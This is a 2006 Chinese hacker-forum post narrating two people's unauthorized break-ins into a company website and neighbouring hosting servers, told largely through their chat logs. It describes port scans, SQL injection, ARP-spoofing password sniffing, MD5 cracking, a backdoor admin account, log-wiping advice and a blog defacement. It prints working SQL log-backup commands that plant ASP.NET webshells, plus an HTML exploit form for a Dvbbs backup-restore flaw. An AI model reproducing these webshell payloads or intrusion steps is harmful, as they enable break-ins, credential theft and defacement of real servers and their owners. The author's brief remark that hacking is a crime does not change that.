10月28号安全焦点DDOS事件背后内幕串串烧

文章整理:安全焦点论坛
作者:cloudx
发布时间:2006-11-09

主题:讲述安焦被DDOS背后的故事及部分安全知识!同时奉送ASP.NET备份db日志获得webshell小知识,小小伎俩,牛人莫笑话俺了。

本贴纯属娱乐大众!慰安下各位fans在安焦被D 9天以来无法灌水的损失。

大家好,我是克劳德,俺来向安焦水区的各位fans道歉来了,10月28号Xfocus遭遇ddos攻击,被迫关闭9天,俺是引起这件事幕后的四只黑手中的两只。另外两只黑手是13Bean同志啦。

下面开始讲故事啦:

话说朽木同学借入侵腾讯公司网络事件一举成名后,更借机到安全一套露了一 小脸,惊起网上呼声一片,一时间,朽木同学好不得意。

正如朽木同学自己所说,他出了名,所以n多人就眼红他的名气了,俺不敢苟同,我对朽木同学地那点名气还瞧不上~说个不好听的话,上了安全一套后,记者提问,如何入侵的腾讯公司网络?朽木同学答阅:我发现了他们服务器的漏洞!绝口不提是风吹过pp好冷同学种马在前,他收获在后了??我一直关注这个事情,一直希望了解下朽木同学入侵的第一步是如何做的,可惜小伙子实在太清高了,俺加他qq后,其一句话:你和我的律师去谈。靠~~~其后发生的事,大家都看到一些啦,不管大家爽不爽,反正我不爽啦,蛋总的*****不是说朽木同学协助修补了网站漏洞么? Ok 那我就拿*****开刀,想想,一个人黑***** 好是无聊,正好,13Bean同志,这位社会主义的弃儿,一直在家待业,等待祖国母亲的召唤,俺就拉了13Bean上了贼船。

克劳德:13Bean,我们黑掉*****,好不好撒?
13Bean:好啊,黑了******更好,挂个黑页你就出名了撒。
克劳德:看了xx人不是很爽,要丢丢他的脸而已。
13Bean:好,我和你一起搞。

就这样,2个闲极无聊的混混走道一起了,从此江湖上一片血雨缤纷…

Ok,有人做伴,黑站也不孤单了!白天忙完工作,晚上回家粗略的看了下,www.*****.com是一台外部托管服务器,机房ip地址在厦门???启动linux虚拟机,操起nmap扫描下端口先。
Nmap –sS –vv –P0 www.*****.com
一杯茶功夫,结果出来了:
开放80,520端口

520??? 觉得纳闷了,telnet 上去,服务器回显serv-u 6.0.x,噢!果然是520哟!!!!serv-u 众所周知,有本地连接管理端口漏洞,呵呵!我也爱你!

奇怪,就80和520,那么远程管理怎么办???难道管理员常驻机房管理??机房的空调和风扇可是很恐怖的噢!
再来扫描瞧瞧:
Nmap –sS –vv –P0 www.*****.com –p 1-65535

-p 1-65535 指定扫描1-65535号端口,默认情况下nmap只会扫描其自带的一份常见端口列表中的端口,大约一千多个端口吧,所以这份端口列表清单以外的端口 nmap是不会去扫描的。

Ok,过了会功夫,再看看结果,已经出来了,这次多了个32915的开放端口,呵呵,32915这个数字好像很眼熟,后来发觉32915是朽木同学的qq号来也,ok,无须质疑,直接运行mstsc,连接www.*****.com:32915

出现了久违的终端管理界面,呵呵,我喜欢。哇,还没回过神,终端窗口弹出一个对话框: 大致内容是 各位小黑朋友珍爱生命啦!不要玩火啦, By 朽木

服务器系统是windows 2003 datacenter版的系统,呵呵,算我愚昧,这辈子玩了多年计算机,第一次见刀datacenter的操作系统,照相纪念先!!!据我所知,好像普通人都用不上datacenter吧?

浏览了下www.*****.com的网站,整站asp程序,粗略估计是asp+sql 或者asp+access结构,首页上连接的asp程序,随手加了单引号测试,看出错信息,变量都做了匹配数字检查了,估计正如蛋总所说,朽木同学热心的修正了蛋总网站的漏洞啦!既然如此,那么走sql注入,找网站漏洞估计没策了,我是没兴趣套字典去爆破web上用户的管理员密码什么的破玩意的啦,说来不怕大伙笑话,我还没用过溯雪爆破过密码啦。靠,web漏洞既然找不到(不是我找不到,闲着没事,娱乐,就懒得去花大力气折腾了,唉,人懒了就不好,做贼也得勤快下啊!!!后来的事实证明一切我都错了,www.*****.com的网站整个一大堆垃圾asp+access数据库拼凑起来的杂种网站,大把漏洞,没有跑asp.net的应用,依旧启用了asp.net的支持,随便request一个http://www.*****.com/test.aspx的页面都能返回asp.net的错误,启用了asp.net意味着什么?只要在能获得aspx的webshell的情况下,普通虚拟主机针对asp做的 webshell以及文件读写权限限制可能就失效了!!!!!),看开放的端口情况,以及hping发出的包的情况来看,hping 发送syn包到其他未开放端口均返回RST包,ttl和开放服务的端口一致,nmap扫描能正常执行下去,那么服务器应该没有硬件防火墙了,仅仅在 win2003系统级启用了系统内置的防火墙了。

Web走不通,那么还有ftp套弱口令? 套口令? 傻子干的事,我才没那么好精神去折腾,菜鸟干活速战速决。

克劳德: ???
13Bean: 在
克劳德:有没看看www.*****.com? 好像普通asp注入都过滤了,你看看这个服务器周边的服务器。
13Bean:好

说完话,翻硬盘,随手找了个webdavscan的工具,扫描www.*****.com的255.255.255.0子网网络的80端口,线程4个,多了会丢失连接或者给防火墙发现的,呵呵。

冲完澡,回来看,结果出来了,子网内大量的web服务器,很多近邻的Apache的banner都一样的,估计都是虚拟主机服务商的虚拟主机了,还有 IIS6 IIS5,也很多,大致估计大部分都是虚拟主机了,虚拟主机就懒的费劲折腾了,一般我个人估计都没戏,没有任何执行权限,估计搞了也是白搞, webshell上去后没法提权的。13Bean也是个懒人,靠,我说没漏洞了,他也不复查看看,折腾来折腾去,后来真是后悔啊!!!!早知道花点心思看看*****就得了,费了不少事。

写到这个时候,安焦又似乎被人d了,无法打开了,唉!!!这年头,还有人玩ddos,md,过时的玩意了,老掉牙了,你就不能来点新鲜的东西么?

继续写下去先!!!!

琢磨了下下一步如何攻击,既然假定asp注入给过滤了,或许存在其他的漏洞,懒的花功夫去翻那个破站的程序了,那么而且开放了3389以及ftp,而且 ftp程序有漏洞,而且iis可以运行asp.net ,那么如果拿到ftp帐户,上传个asp.net的webshell上去,那么轻松就获得了users用户组的权限,想办法运行serv-u本地溢出或者找其他的本地如06040的溢出获取system权限,ok,那么就老办法,内网sniffer吧!

运气特好,花了点功夫,在子网里面翻到了一个asp的注入漏洞的,而且是dbo权限,立刻本地装了个mssql2000,调试温习了下相关的sql语句,脚本小子都莫笑话俺了,现在工作不用 sql2000了,都忘干净了,瞎折腾了一下,顺利拿到了system权限,3389登陆系统,ipconfig,靠!!!竟然是 255.255.255.224的子网掩码,完了,不在同一子网,看来算计arp攻击的 没策了。

13Bean: 白搞了啊,不是同一子网,靠
克劳德: 是啊,倒霉,知道子网掩码了,继续找那个子网的

下面一台一台的到webhosting网站查虚拟主机了,靠,痛苦啊,随便翻来翻去,好像找不到入侵点了。

13Bean:有搞头
克劳德:怎么?我没看到什么网站有漏洞啊
13Bean:你看XX.XX.XX.XX这个ip 有个XX网站,XX网站肯定有漏洞撒
克劳德:哇,我发现你好伟大,我看的时候好多域名捆在上面,可是都是过期了,下面几个我都懒的翻了。
13Bean:黑客精神不能放弃撒
克劳德:jb黑客,老子和你是2个sb黑客

好,继续看13Bean丢过来的xx网站,好几个应用程序,asp+access的,很自然有sql注入漏洞,也很随便的猜到了后台地址。找个工具,暴到了后台管理密码,一个图片管理系统,找来找去好像没上传漏洞等可以利用的。

克劳德:13Bean,怎么样了,图片管理系统后台好像没有什么可以利用的
13Bean:等等,我一句话木马写进去了,找了另一个后台,马上获得webshell
克劳德:好
。。。
。。。
13Bean:http://www.xxx.com/helper.asp 站长助手,密码123456
克劳德:偶像啊!!!!
13Bean:日
克劳德:赶快serv-u提权看看
13Bean:==
。。。
。。。
13Bean:哈哈,成功了
Net user
User accounts for \\XX服务器

——————————————————————————-
Administrator goldsun Guest
Iusr_xx IWAN_xx
The command completed successfully.

用户名:goldsun 密码:love
克劳德:噢,偶像!!!你好伟大!
13Bean:(害羞表情)
克劳德:我现在上去,装cain 抓内网密码,赶快在搞一台肉鸡,然后sniffer 蛋蛋的*****
13Bean: 好,渗透的事交你了
克劳德:我怕朽木在服务器上装了antiarp,如果我直接sniffer 蛋蛋的站,估计利马就给发现了,保险点,在搞台肉鸡比较好(事后证明我是个大sb,总是把别人高估了)
13Bean:嗯

登陆肉鸡,顺利装了cain,选定了几个目标,开始arp spoof攻击,抓ftp密码。

天色已晚,挂机,睡觉先。

Cain 是我感觉在渗透时最好用得sniffer软件了,普通的明文密码都可以抓获,sql,mysql,http等等,感觉用过的最方便的一次是在一次sql注入中,已经获知了web连接sql是dbo权限,对 web和db之间的通信做了arp欺骗攻击,轻松就获得了sql的dbo用户密码,进而获取了system权限。arp spoof以及sniffer几个鼠标点击就完成了,相比同类型的linux下的ettercap相对差了点,至少操作不方便,相对国内的卖网马,卖 expliot的所谓黑客高手而言,国外的黑客至少我觉得从精神上道德上比中国所谓的黑客要高尚多了,某些人写了个所谓的独立开发完成的木马或者ddos 工具无不拿出来炫耀,卖钱去了,精神没有专注在技术上,我想写出来的程序也不会好到哪里去吧,如此下去,中国永远不可能出现类似cain这样如此优秀的程序了。

声明下:我不是什么专职黑客,13Bean也不是,我只是个系统管理员,对系统漏洞,安全方面大致都一些了解,一年多也没接触 sql注入了,手工注入命令都忘记了,这里入侵用到的知识只是平时系统、网络管理知识的积累,以及google找的相关资料,以前接触过一些黑客知识,现在感觉主要加深了个人对系统整体安全防御的理解。奉劝各位,黑客没有什么前途,最近我看了很多黑客界的娱乐新闻以及所谓的内幕,所谓的第4,第5代黑克都 tmd是小人,骗子流氓,真正研究黑客技术就注定不能接触黑金!!!粘了黑钱,技术也不叫技术了,这是真话。不过俺蛮喜欢看黑客界的娱乐新闻和内幕第,欢迎各位fans 和我交流娱乐新闻哟!!

黑客?其实再想想,黑客都是流氓小人骗子,未经主人同意,入侵了系统,难道不是么?偏偏一大群小 p孩喜欢跟风,是吧,很光荣,对吧,一大堆人追捧你,或许觉得很有意思?但请不要忘记了本质,你入侵了系统,你tmd 就是个贼了,你就触犯了刑法,虽然有人会以他还是个孩子我还小我不懂事来逃避责任,说多了听多了也觉得腻味了。黑客?所谓的丰功伟绩,英雄事迹哄哄小孩子农民伯伯或许还行的通,哄内行人给人看了笑话。随便抓个所谓的黑客过来我想问几个基本的网络问题就可以把他问的无语,做黑客?最少要理解网络吧?不管你用工具也好,但如果你连底层协议运作都不明白,你算个鸟的黑客?真正理解了网络,明白了安全的人,随时都可以客串黑客过过所谓的黑客的瘾。

现在中国标杆的第1 2 3代后客都拼了命的骂第4 5代黑客越来越堕落了??不知道形容的对不对,不去研究底层安全技术,就知道玩脚本入侵,我觉得也好笑,或许现在的第4 5代黑客生财有道,偶听说教主赚了300w啊???老前辈们看了估计比较郁闷?也许眼红?毕竟正规正局的赚那么点技术钱真的很不容易。但不管你是脚本黑客还是底层黑客,你只要在自我的基础上超越了自我,我觉得就够了,毕竟,安全涉及了方方面面,底层编程?系统防御?网络过滤?行政管理?很多,也让人很疲倦,如果老前辈们非要逼迫那些不懂c 数据结构的第4 5代黑客去做些研究底层编程的问题,或许这样他们认为是真正的在研究安全了,但我想也没有任何意义,研究下去个人的能力是否能有质的提升?我对程序不在行,所以我一直没有进入程序这一块,但我并不觉得我在安全以外。是否喜欢研究底层核心安全只在于他个人是否愿意在精神技术上提升自己了,在中国这个浮躁势利的社会,任何的一切都是为了¥,活着的人其实都很无奈的为了¥而活着。

天亮鸟,继续干活,登陆肉鸡3389,上cain看了下,抓了大把http密码,好像还有管理员的后台密码,ftp密码也有几个,一个一个的登陆上去看了几下,顺便把相关密码信息留言发给13Bean的qq上了。

白天忙工作先,差不多太阳晒屁股的时间,13Bean同志从床上爬上网上来了。上来就打了个招呼先,不愧是在同一条战线上的好同志啊!!!

13Bean:有没什么收获,内网?
克劳德:抓了几个机器的ftp和web系统的管理后台,好像都是虚拟主机,有一两个是托管的服务器,但找不到可以利用的地方。先等等,继续等等,多弄台肉鸡保险点好。
13Bean:哈哈,搞不到,老子就到内网d蛋蛋的机器
克劳德: 靠,你也太没品味了吧,这年头,你还玩d?
13Bean:说的好玩的,鬼才d他,我在看看你发来的sniffer到的密码先。
克劳德:你看这里哟http://www.tianya.cn/xxxxx.htm,我发掘了一个火贴,蛋总发的朽木同学某年某月要接受安全一套的采访的帖子,不看里面的视频我还真不晓得咧,xfocus的flashsky也跑到里面灌水啊,我们也去起哄去撒!!!
13Bean:好啊,把这个帖子顶上去

就这样 2个无聊的家伙又到天涯闹翻了天,最后该帖子翻页过了4页,辛苦死了!我再这里替各位没有看到的fans回味下,这个帖子内容非常精彩,揭短对骂的火爆异常啊!可惜第二天再上去灌的时候发现已经被删除了,不知道是为何?俺发现所谓的黑客圈子,每每只要吵架就特别娱乐哟!什么狗屁内幕啊,都给甩出来了。真可谓是娱乐大众的好题材。

克劳德:天涯的帖子给删了啊!靠 好不容易炒作到那样了,暴了好多内幕哟
13Bean:啊???不会吧 昨天晚上的我还没有看啊!!!遗憾啊
克劳德:这里还有个撒,安焦的
https://www.xfocus.net/bbs/index.php?act=ST&f=1&t=62188&page=all 安焦的肯定不会删,你看看,这个帖子再安焦水区的推荐贴哟!!!天涯的删就删,到安焦炒作区撒
13Bean:好,你还蛮喜欢看这些娱乐新闻咧?
克劳德:没办法撒,我们是伪黑客,关注下娱乐新闻 过过黑客的瘾撒!

天涯吵完鸟,继续干活,等了好几天了,就是没有嗅到什么有价值的东西,郁闷啦!!

13Bean: 有没消息?
克劳德:没有啊,倒是嗅到了一大堆sa密码,有个sb一天到晚的用工具爆破旁边一台机器的1433端口的sa密码,他不累老子看的都累了
13Bean: 这种sb现在还有啊???
克劳德:没办法撒,我们伟大祖国的黑客培训事业欣欣向荣,也培育了一大堆可爱的小黑撒
13Bean: 就是 服了他们了,随便都能爆破个sa密码 那小黑不都成了大牛了?
克劳德:再等等吧,我怕朽木真装了antiarp,不然我随便嗅他的,那我不给暴露了?靠 到时候警察叔叔要来抓我的哟
13Bean:直接搞了拉倒,少费事
克劳德:烦躁,搞!我修改下Cain的端口过滤规则,把ftp的21要改成520端口,朽木改了ftp的默认端口
13Bean:好
克劳德:靠,竟然可以搞arpspoof,我还因为朽木搞了antiarp之流的东西,吓死我鸟,我怎么老高估了别人?
13Bean:你个sb,折腾这么多事
克劳德:我只是客串出演下黑客,技术不娴熟撒
克劳德:我抓了个sql2000的帐户,旁边有台机器好像和远程做了分发同步,每天都定时连接数据库做数据同步,普通db_owner的权限,可以备份日志搞个webshell,你等等,我可以直接从外部用sql企业控制台连接服务器的1433呢
13Bean:对外开放了网站么?
克劳德:有,www.xxx.com www.bbb.com www.ccc.com都是的,不过都是aspx的站,好像不支持asp,请求asp提示内部错误
13Bean:那写asp的一句话木马,备份日志获得webshell走不通了???
克劳德:估计是的,aspx的一句话木马网上有没有啊??
13Bean:没有 我搜索过了
克劳德:你等等,我找找asp.net的代码调试下,或者我找个朋友问问
13Bean:好

过了一两天

克劳德:兄弟,我成功了,aspx的备份日志木马我搞定了,我搞了2个
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("i.aspx"),false);ow.Write(Request.Params["m"]);ow.Close()%> ')
backup log pubs to disk = 'd:\haha.aspx'
这个和asp的一样,客户端post一个变量m 把木马代码丢在变量m里面 就ok了 这个是类似asp的一句话木马

下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用,我在本机调试好了

drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" OnServerClick="bc" /></form>')
backup log pubs to disk = 'c:\inetpub\wwwroot\ha.aspx'

13Bean:web路径你知道么?
克劳德:web路径知道啊,用xp_dirtree找到路径了
13Bean:你快搞啊
克劳德:等等。。。
克劳德:代码有点问题啊,怎么在服务器上执行备份的代码执行会出错啊??
伤脑经,http://wwww.xxx.com/haha.aspx 你看
13Bean:怎么回事?
克劳德:你等等 错误提示里面我的木马代码怎么有个字符给替换成一个特殊字符了??
13Bean:你自己看看,我不懂
克劳德:我在弄弄

克劳德:我知道原因了,备份的日志文件好像sql内部用了这个特殊字符做分界符??我刚才把代码全部改成aaaaaaaaaaa的普通文本了,请求url没有报错,看来那个字符在搞鬼,我知道怎么搞了
13Bean:好 等你消息了
克劳德:ok,搞定了,在写木马到db的时候,在木马代码前面填充306个字母a 我就躲避过了这个字符,备份的webshell可以执行了
13Bean:地址?
克劳德:http://www.xxx.com/ok.aspx
13Bean:怎么上传文件也会出错啊?
克劳德:我不知道啊啊,烦死了,.net默认屏蔽了外部看到错误信息的,只能本地看到错误信息
13Bean:怎么办?
克劳德:你等等,我刚才改的那个aspx的上传文件代码里面有错误捕获的,为了最小化代码,我去掉了。我加入错误捕获看看是什么导致的
13Bean:好
克劳德:
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\T ' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bp(object o,EventArgs e) {string u="files";string filename;try {int pos = f.PostedFile.FileName.LastIndexOf("\\");if (pos > 0) filename = f.PostedFile.FileName.Substring(pos + 1);else filename = f.PostedFile.FileName;Response.Write(Server.MapPath(u) + "\\" + filename);f.PostedFile.SaveAs(Server.MapPath("filename"));} catch (Exception ex) {Response.Write("Error: " + ex.Message.ToString());}}</script><form method="post" runat="server"><input type="file" id="f" runat="server" size="50"/><input type="submit" value="s" runat="Server" OnServerClick="bp" /></form>')
backup log pubs to disk = 'd:\haha2.aspx'
克劳德:http://www.ddd.com/haha2.aspx 丢上去了,靠 提示上传文件没有写入权限,靠!!!!
13Bean:倒 怎么这么变态?
克劳德:老子倒霉,白折腾了几天
克劳德:噢,你等等 他有一个网站的后台,是弱口令,可以登陆进去,里面可以上传图片管理的啊,我记得我都用过,那么那个上传图片的目录一定有写权限,你在等等
13Bean:好
良久
克劳德:ok 找到图片上传路径了 http://www.xx.com/upload/haha.aspx 我写这里去了 上传文件ok了! http://www.xx.com/upload/ok.aspx木马 密码123456
13Bean: 怎么提示文件找不到
克劳德:啊?不会啊 上传其他的文件都没有问题啊!!!难道被杀了?
13Bean:你等等 我有个aspx的免杀木马
13Bean:ok 搞定 哈哈http://www.xx.com/upload/ok.aspx 密码123456
看看可否提权
克劳德:幸好上传图片的目录他没有禁止执行脚本啊!不然就彻底没戏了。
13Bean:好像找不到提权的利用服务啊!
克劳德:你找找本地执行提权的 不是有06030 06040么 有效么、 这个aspx的木马有cmd.net对象 有执行权限的。
13Bean:好像不行 030被杀了 你找找040的溢出
克劳德:好 再找找。

过了n小时后,这里n<3

克劳德:靠 我到肉鸡的3389断开了,无法连接了,发包都没响应了
13Bean:啊?被发现鸟??
克劳德:不知道啊,嗅的几个机器都没有响应了,都无法连接了
13Bean:那估计真给发现流量异常了,管理员把机器都断网查记录去了。。。
克劳德:这么恐怖啊??? 我和你的ip不都记录了?
13Bean:废话,赶快清机器的历史记录,网监找来了 不认帐他们也没办法的
克劳德: 再等等先

又过了n小时后

克劳德:蛋蛋的站恢复了啊
13Bean:肉鸡的呢?
克劳德:肉鸡的还没恢复啊!再等等,其他的机器都恢复过来了
13Bean:很凶险啊!你小心点,现在不要连接了,免的那边再监听数据,不然就死瞧瞧鸟哟!
克劳德:我晓得,放心,nnd 气死我了

就这样,2个sb黑客差点成就了一个伟大的事情,确因为cain程序的bug,导致白忙活一场(事后又碰到一次,已经确定是cain程序bug导致)

第二天,一大早上班

克劳德:哇,肉鸡恢复了,可以连接了
13Bean:是么,帐户还可以登陆么
克劳德:你等等先,我登陆看看
13Bean:有没有被发现啊??
克劳德:帐户还可以登陆,服务器刚重启了几小时,估计没被发现
13Bean:继续干活啊
克劳德:好

继续打开cain,再次sniffer。。。

又过了一两天

13Bean:有没抓到密码?
克劳德:没有啊,这几天都没有人ftp登陆啊
13Bean:那等下去也不是办法撒
克劳德:再看看蛋蛋的*****的web瞧瞧有没漏洞 能利用下?
13Bean:我正在看
克劳德:你有没有看到华艺传媒的介绍哟???我突然发现 原来芙蓉姐姐就是他们炒作的啊!!!不晓得芙蓉姐姐现在是恨死他们鸟还是爱死他们鸟???
13Bean:这个。。。你问广大人民群众去,少数服从多数,人民说芙蓉姐姐爱就爱,人民说芙蓉姐姐不爱就不爱撒
克劳德:不扯了
克劳德:http://www.*****.com/upload.asp 你看哟,可以直接上传文件,好像存在上传漏洞,赶快把你的asp.net webshell发我个哟
13Bean: 不行啊,上传文件提示错误,掉了个上传inc的类文件
克劳德:啊。。。确实是的, 郁闷 空欢喜一场啊!!!
http://www.*****.com/xxx/xxx.asp?id=232 你看看这个哟 ,加了单引号出错鸟,是asp+ access的程序,赶快找个工具猜解啊!
13Bean:我来,你等等

良久

13Bean: 密码出来了
Admin xxxxxxxxxxxxx(md5编码密码)

克劳德:你等等,我找找md5在线破解库

克劳德:admin 密码122425
13Bean:后台呢????
克劳德:你看看http://www.*****.com/admin这个
13Bean:好,我登陆进去了
克劳德:我也登陆进去了,是个什么垃圾拼客的后台管理,后台功能很弱啊,没什么可以利用的,在找找别的
13Bean:他还有商务程序,多看看,这种企业建站的程序一般都有漏洞
克劳德::好
13Bean:http://www.*****.com/xvxvc/dadf.asp?id=332 这个也可以注入,什么狗屁程序,和菜园子门没两样了,之前就应该直接搞他的,你看你,搞那么多事,浪费感情。
克劳德:莫这样诋毁人家管理员的水平撒,进去了也不能提权,这说明人家管理员做的安全还是有一套第~让你小玩几把,你就莫起哄撒!
13Bean: 。。。。。。
克劳德:我刚才用Acunetix Web Vulnerability Scanner 4抓了一下网站文件结构,你看看这个http://www.*****.com/bbs/xxx.asp
13Bean:BBSXP??下面的banner显示bbsxp6的程序?
克劳德:是啊,http://www.*****.com/bbs/database 你看 目录禁止list
我去官网下个bbsxp6的程序看看目录结构,程序很老,应该有注入漏洞,你找找,管理后台可以访问http://www.*****.com/bbs/admin
13Bean:好

过了会功夫

克劳德:日噢,什么狗屁东西,http://www.*****.com/bbs/database/bbsxp6.mdb
数据库都可以直接下载,老子和你怎么那么费事?
13Bean:sb 赶快下了找admin的密码
克劳德:老子怎么知道这年头还有这么弱智的人存在?你等等,数据库有100多m,真bt
13Bean:估计这下蛋蛋的蛋要破了,哈哈
克劳德:db我下载了,admin密码是xxxxxxxxxxxxxxxxxxxxxx(md5编码) 你等等
克劳德:admin 122423 密码,真tmd费事,只怪老子不会用硕雪,不然直接爆破了拉倒
13Bean:进后台,备份db就可以得到webshell了
克劳德: 等等 后台不能备份db啊,备份db的路径都给写死了的啊!!!
13Bean:改上传文件限制,容许上传asp asa 文件一样的可以搞
克劳德: 好 我来
克劳德:怎么搞的,我容许上传asp asa文件 还是不能上传啊???
13Bean:那估计程序内部限制死了,靠 没策
克劳德:我上传aspx的文件iis确提示文件找不到,靠,怎么回事啊?
克劳德:服务器移除了.net支持, 前天我记得请求aspx的url 服务器会提示找不到aspx的文件,会报.net的错误,今天请求aspx 只是报404错误了,靠
克劳德:md,迁移了服务器了,现在和******.com的服务器在同一台机器上了,服务器在郑州机房了,靠 sniffer没戏了。
13Bean:你个sb,之前直接搞*****不就到手了,这下好了,把******的一起黑掉拉倒
克劳德:这个服务器就开了21 80 3389 好像是虚拟主机空间了,ftp是iis的ftp
13Bean:想想办法,在搞台同子网的机器,在抓包,我就不信干不掉*****
克劳德:你这不是又糟蹋我么?搞这破事完全是体力活啊,吃亏不讨好,没得任何技术含量
13Bean:搞到这地步 不搞就亏大了
克劳德:再找周边的机器,还是老办法,sniffer抓包 只能这样了

过了一两天

克劳德:你看这里哟http://www.******.com/sex.htm 你看 这小*孩子 刚丢了个所谓自己用vc写的僵尸军团 ,又说过几天要去广州开公司,真是不知天高地厚
13Bean:没办法撒,人家小火子自我感觉超好么,有么办法咧?
克劳德:狗屁,汉化了别人的程序 就对外宣称自己写的vc程序,不丢脸么?
13Bean:兄弟啊,你给人家留点台面好不好,好歹人家过几天就是公司的ceo了
克劳德:走着瞧撒,要技术没看到技术好哪去?至于人品我也不知道,至少蛋总的站不是他再维护么? 一大堆漏洞,最起码蛋总保他出来,他做人不够义气!

13Bean:有消息了么?
克劳德:我找了旁边的一个blog网站,是oblog 3.0 网上报告有漏洞,我注册个用户先,你等等
http://www.xx.com/ddd.htm 这里描述了漏洞信息 你看看,不知道这个漏洞修补了没有 ,这个参数只过滤了’
13Bean:我看看
克劳德:ok 存在漏洞 你看http://www.sss.com/blog/aaa.asp?id=ddd (URL虚构)
13Bean: 是什么权限、只对注册用户开放 我无法访问
克劳德: 是sql的dbo用户哟!!!是子怎么注入总是能碰到dbo用户哟?
13Bean:倒 你运气好 没办法撒
克劳德:你等等 我看可否写一句话asp木马进去
13Bean:好 他还有个动网7.0 sp1的程序
克劳德:奇怪 不能执行啊 我再本地测试不带’的sql语句 也不能测试通过啊,我记得以前注入的时候都用过,怎么今天无法通过了,再服务器上无法通过,走不通了,我暴管理员后台密码先,你等等我去下个官方程序看看db结构
13Bean:oblog的管理员表再oblog_admin 密码字段是admin_user admin_password
克劳德:md5的管理员密码暴出来了,xxxxxxxxxxxxxxxxxx再线md5库破不出来啊
13Bean:用注入给他改掉
克劳德:好 ,你等等 oblog的管理员用户名是adminn 密码是123456
后台http://www.xx.com/blog/admin/admin_login.asp
13Bean:后台好像没有什么可以利用的地方啊,程序安全写的很好
克老德:是啊,你等等,我把动网的管理员密码暴出来,他的动网也是sql数据库的,也要注入改掉,伤脑经,和blog一样的密码
克劳德: admin 123456 后台地址是http://www.xxx.com/admin/admin_login.asp
还要暴一个前台的用户要有管理员资格的 靠 动网7.0sp1 真复杂
13Bean:进去了到后台改上传 就到手了 这台服务器
克劳德:前台用户找到了 用户名 xxx 密码bbb 和后台管理员使用才能登陆后台
13Bean:好的 我去改后台
克劳德:好 你弄 我休息下
13Bean:不行,动网现在程序内部禁止上传asp asa mdb文件了 都没戏了 是sql的 又不能备份 我日
克劳德:等等 我再找找 真麻烦
克劳德: 你看这个 http://www.dadfa.com/hdafda.htm 他的数据库备份的程序文件还存在,还可以利用,从外部递交参数 一样可以执行和access版一样的备份数据库获得webshell。先上传个图片夹带asp木马程序就可以了
克劳德:这个是利用代码
<html>
<head>
<title>巫师动网7.1 SP1 SQL版本得webshell</title>
</head>
<body>
<form action="http:///bbs/admin/data.asp?action=RestoreData&act=Restore" method="post">
<pre>
<p>
<font size=3 color=red>此处输入成功上传的文件的路径信息:</font>
<input name="Dbpath" type="text" size="100">
</p>
<p>
<font size=3 color=red>此处输入恢复的asp木马的路径信息:</font>
<input name="backpath" type="text" size="100">
</p>
<p>
<input type="submit" value="确认提交" style='background-color: #f0f0f0; color: #000000; border: 1 solid #000000'>
</p>
</pre>
</form>
</body>
</html>
克劳德: ok 木马地址http://www.ccc.com/haha.aspx 密码123456
赶快进去找db连接文件找sa密码
13Bean:好
13Bean: 我找到了,sa bakeee
克劳德:ok 用aspx木马的sqlroot 就可以执行system级的命令了 我加了用户goldsun密码love 你用3389登陆 哈哈 是个虚拟主机提供商的服务器
13Bean: 好 我进去看看
13Bean: 是同一子网的,蛋总这回估计真要挂了 哈哈
克劳德:嗯,我来cain监听抓包

过了两天,成功抓到了*****.com的 ftp密码了。。。

13Bean:朽木的密码抓到没有?
克劳德:没有 小家伙一直没有登陆
13Bean:直接搞掉蛋蛋的算了?
克劳德:不行 再等等 搞了蛋蛋的 朽木的就搞不成了 要就一起搞

N长时间后

克劳德:抓到朽木的blog后台用户密码了,可以登陆进去管理blog了,不是管理员的,用户名:朽木;密码:****** 你看看******
13Bean:没办法撒 人家喜欢
克劳德:他骨子里都有股清高,他总是谦虚的不能再谦虚了,总说自己计算机水平不怎么样,是腾讯的安全水平搞的太菜,才让他入侵进去的,这不就是摆明了说自己计算机水平不怎么样但还是比腾讯的安全人员的菜菜水平要好???不知道他说别人水平太菜的时候,是否想过自己能否比别人做的更好?
13Bean:不要这样理解撒,人家这叫谦虚,只是我们大家思想太恶毒了,想歪了而已撒。
克劳德:后台没什么用途哦! 也是oblog3.0+access,注入漏洞给他填了
13Bean:改他blog 让他登陆管理员后台
克劳德:你来搞 ,我懒的折腾 完全一苦力活 费事

下班鸟,再路上,发个短信聊聊:
你后台都改了么?
把图片都删除了
他不会发现的啊,这样他就不会登陆了,你把他首页也改掉
改了

晚上。。。

13Bean:抓到密码没有?他这会好像应该是出去接受中央电视台采访了哟
克劳德:日哦,你还蛮懂风情的? 给他blog换了个纯情的小姑娘风格
13Bean:呵呵
克劳德:他回来了,首页改回去了,怎么没抓倒后台管理员密码?
13Bean:我好像没改他用户的密码
克劳德:倒,暴露了
13Bean:再等等撒,反正你能抓包,怕什么

写到这里的时候,一个朋友,安焦发了个帖子,也把蛋蛋的站进去完了一把,既然是同路人,咱就加的聊聊了。没想到,又聊出一番故事,呵呵。

热血青年 12:24:27 你好
xxx 12:24:51 吃饭没啊,呵呵
热血青年 12:24:51 刚吃完
热血青年 12:25:01 *****没搞到system权限?
xxx 12:25:12 偶也是,
xxx 12:25:27 哦,没继续进,只想看看
热血青年 12:25:36 sniffer德?
xxx 12:25:43 有点好奇而已
xxxx 12:25:52 网站漏洞
热血青年 12:25:49 直接替换首页拉到
热血青年 12:25:54 网站哪里德漏洞‘、?
xxx 12:26:06 那不好吧,
热血青年 12:26:07 之前我倒没找倒网站漏洞噢
xxx 12:26:13 多了,呵呵
热血青年 12:26:11 是蛮多
xxx 12:26:20 你??
热血青年 12:26:15 你找德哪个 告诉我
xxx 12:26:28 我给补上了
热血青年 12:26:31 大致描述下 哪里德
热血青年 12:27:13 同路人撒 和你
xxx 12:27:37 给你后门吧
